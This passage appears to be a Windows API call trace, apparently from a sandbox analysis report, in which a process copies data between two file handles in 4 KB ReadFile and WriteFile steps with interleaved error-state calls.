ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.563] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.564] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] GetLastError () returned 0x0 [0094.564] SetLastError (dwErrCode=0x0) [0094.564] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.564] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] GetLastError () returned 0x0 [0094.565] SetLastError (dwErrCode=0x0) [0094.565] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.566] GetLastError () returned 0x0 [0094.566] SetLastError (dwErrCode=0x0) [0094.566] GetLastError () returned 0x0 [0094.566] SetLastError (dwErrCode=0x0) [0094.566] GetLastError () returned 0x0 [0094.566] SetLastError (dwErrCode=0x0) [0094.566] GetLastError () returned 0x0 [0094.566] SetLastError (dwErrCode=0x0) [0094.566] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.566] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.567] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.567] GetLastError () returned 0x0 [0094.567] SetLastError (dwErrCode=0x0) [0094.568] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.568] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.568] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.568] GetLastError () returned 0x0 [0094.568] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.569] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.569] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.569] SetLastError (dwErrCode=0x0) [0094.569] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.570] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.570] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.570] GetLastError () returned 0x0 [0094.570] SetLastError (dwErrCode=0x0) [0094.570] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.571] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.571] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.571] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.571] GetLastError () returned 0x0 [0094.571] SetLastError (dwErrCode=0x0) [0094.572] GetLastError () returned 0x0 [0094.572] SetLastError (dwErrCode=0x0) [0094.572] GetLastError () returned 0x0 [0094.696] SetLastError (dwErrCode=0x0) [0094.696] SetLastError (dwErrCode=0x0) [0094.696] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.696] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.696] SetLastError (dwErrCode=0x0) [0094.696] SetLastError (dwErrCode=0x0) [0094.696] SetLastError (dwErrCode=0x0) [0094.696] SetLastError (dwErrCode=0x0) [0094.696] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.696] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.697] GetLastError () returned 0x0 [0094.697] SetLastError (dwErrCode=0x0) [0094.697] GetLastError () returned 0x0 [0094.697] SetLastError (dwErrCode=0x0) [0094.697] GetLastError () returned 0x0 [0094.697] SetLastError (dwErrCode=0x0) [0094.697] GetLastError () returned 0x0 [0094.697] SetLastError (dwErrCode=0x0) [0094.697] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.697] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.698] GetLastError () returned 0x0 [0094.698] SetLastError (dwErrCode=0x0) [0094.698] GetLastError () returned 0x0 [0094.698] SetLastError (dwErrCode=0x0) [0094.698] GetLastError () returned 0x0 [0094.698] SetLastError (dwErrCode=0x0) [0094.698] GetLastError () returned 0x0 [0094.698] SetLastError (dwErrCode=0x0) [0094.698] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.700] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.700] GetLastError () returned 0x0 [0094.700] SetLastError (dwErrCode=0x0) [0094.700] GetLastError () returned 0x0 [0094.700] SetLastError (dwErrCode=0x0) [0094.700] GetLastError () returned 0x0 [0094.700] SetLastError (dwErrCode=0x0) [0094.700] GetLastError () returned 0x0 [0094.700] SetLastError (dwErrCode=0x0) [0094.700] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.700] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.701] GetLastError () returned 0x0 [0094.701] SetLastError (dwErrCode=0x0) [0094.701] GetLastError () returned 0x0 [0094.701] SetLastError (dwErrCode=0x0) [0094.701] GetLastError () returned 0x0 [0094.701] SetLastError (dwErrCode=0x0) [0094.701] GetLastError () returned 0x0 [0094.701] SetLastError (dwErrCode=0x0) [0094.701] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.701] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.701] GetLastError () returned 0x0 [0094.702] SetLastError (dwErrCode=0x0) [0094.702] GetLastError () returned 0x0 [0094.702] SetLastError (dwErrCode=0x0) [0094.702] GetLastError () returned 0x0 [0094.702] SetLastError (dwErrCode=0x0) [0094.702] GetLastError () returned 0x0 [0094.702] SetLastError (dwErrCode=0x0) [0094.702] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.702] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.702] GetLastError () returned 0x0 [0094.702] SetLastError (dwErrCode=0x0) [0094.703] GetLastError () returned 0x0 [0094.703] SetLastError (dwErrCode=0x0) [0094.703] GetLastError () returned 0x0 [0094.703] SetLastError (dwErrCode=0x0) [0094.703] GetLastError () returned 0x0 [0094.703] SetLastError (dwErrCode=0x0) [0094.703] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.703] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.703] GetLastError () returned 0x0 [0094.703] SetLastError (dwErrCode=0x0) [0094.703] GetLastError () returned 0x0 [0094.704] GetLastError () returned 0x0 [0094.704] GetLastError () returned 0x0 [0094.704] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.704] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.704] GetLastError () returned 0x0 [0094.704] GetLastError () returned 0x0 [0094.704] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.705] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.705] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.705] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.706] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.706] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.707] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.707] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.707] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.707] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.708] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.708] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.709] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.709] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.709] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.709] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.710] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.710] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.711] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.711] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.711] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.711] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.712] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.712] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.713] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.713] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.713] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.714] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.714] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, 